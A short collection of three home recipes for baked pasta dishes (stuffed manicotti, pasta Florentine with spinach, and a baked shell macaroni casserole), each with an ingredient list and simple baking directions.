Baked Stuffed Pasta

INGREDIENTS:

1 box manicotti
1 1/2 lbs. low fat cottage cheese
1/4 c. flavored bread crumbs
1/2 c. Parmesan cheese
1 tbsp. dried parsley
1 egg, slightly beaten
1 lb. sweet Italian sausage
1 1/2 lbs. hamburger
1 lg. jar Ragu spaghetti sauce

DIRECTIONS:

Brown hamburger and drain. Boil sausage for about 15 minutes, remove from water, pierce jackets and let drain, cut into bite sized pieces. Add both meats to Ragu sauce in a large bowl.
Cook manicotti according to directions. Rinse and drain in cold water. Preheat oven to 350 degrees.

Mix cottage cheese, egg, 1/4 cup Parmesan cheese, 1/4 cup bread crumbs. Then fill cake decorating forcing bag with cheese mixture and squirt it through manicotti. Spoon enough sauce in bottom of an 8″x11″ pan to cover and place stuffed manicotti in pan. Cover with remaining sauce and sprinkle with additional Parmesan cheese. Cover with aluminum foil and bake at 350 degrees for about 45 minutes or until bubbly.

Baked Pasta Florentine

INGREDIENTS:

3-4 c. cooked vegetable (or plain) rotini
2 (10 oz.) pkg. frozen, chopped spinach, cooked & drained
1 can condensed cream of mushroom soup
1/2 can condensed cream of celery soup
The grated rind & juice of 1/2 lemon
2 c. shredded Cheddar cheese
3 eggs
1/3 c. chopped onion
Pepper

DIRECTIONS:

Mix all ingredients. Pour into a 9 x 12 x 2 inch baking dish. Bake at 350 degrees for about 30 minutes. Top with additional cheese. Oven Baked Pasta

INGREDIENTS:

1 box shell macaroni
1 lb. hamburger
1 lg. jar spaghetti sauce
8 oz. grated cheddar cheese
8 oz. grated mozzarella cheese
1/2 c. chopped green pepper
1/2 c. chopped onion
1 c. mushrooms

DIRECTIONS:

Cook macaroni until tender. Brown hamburger. In 9 x 13 pan mix macaroni, hamburger, spaghetti sauce, peppers, onions and mushrooms. Sprinkle cheese over top. Bake at 350 degrees until cheese is melted and slightly brown.
Can be made ahead and reheated.
